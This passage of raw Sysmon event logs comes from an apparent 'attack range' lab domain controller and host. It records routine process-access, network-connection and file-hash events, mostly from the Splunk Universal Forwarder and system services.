Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293341Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:45.052{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293340Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:45.032{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000293356Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:44.630{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local53790-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local445microsoft-ds 354300x8000000000000000293355Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:44.630{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local53790-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local445microsoft-ds 23542300x8000000000000000293354Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:46.167{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A0BD4502E27B66E1885A08A289BE4EFD,SHA256=5F0B80E6B4660696E8DE6DA96CD0D4744C690D70F4ACBC73566EBD47AE83FD0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293353Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:46.167{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9E03CBAE76EE127E839985DF88D5482C,SHA256=962C8ED0F66D6C76F6B529600A7F7829F2250B5F1721439D65DAF0A744BA2B16,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000293352Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:44.527{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53789-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000293351Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:44.527{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53789-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000293350Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:44.509{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local53788-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000293349Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:44.509{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local53788-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000293348Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:46.083{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6645D5469E00D8B0DBA5F065F6EECDE3,SHA256=CEBBF2A27C7B7D8624405B275756FC892A1AEABA6EFD5F2A998AD950DC2835A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217861Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:46.161{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217860Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:46.082{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=354B5CE59591A1C63FC46270AD21DDAC,SHA256=F8235FB32136B22B6DD50DF12A68C7E58082363F315A82B27C7487DF77749A3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293357Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:47.098{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=483F4309D61FDB5A45E5855C989F1BD2,SHA256=CEFDA44960A8F08703BE13FED13A24621BC94C0E08213594A5377F337264E337,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000217888Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:47.880{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-132B-6216-8D04-000000003902}1036C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217887Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:47.880{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217886Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:47.880{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217885Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:47.880{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217884Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:47.880{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217883Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:47.880{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217882Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:47.880{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217881Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:47.880{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217880Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:47.880{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217879Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:47.880{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217878Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:47.880{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-132B-6216-8D04-000000003902}1036C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217877Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:47.880{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-132B-6216-8D04-000000003902}1036C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217876Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:47.881{4F8D34B0-132B-6216-8D04-000000003902}1036C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000217875Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:47.208{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-132B-6216-8C04-000000003902}1008C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217874Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:47.208{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217873Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:47.208{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217872Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:47.208{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217871Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:47.208{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217870Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 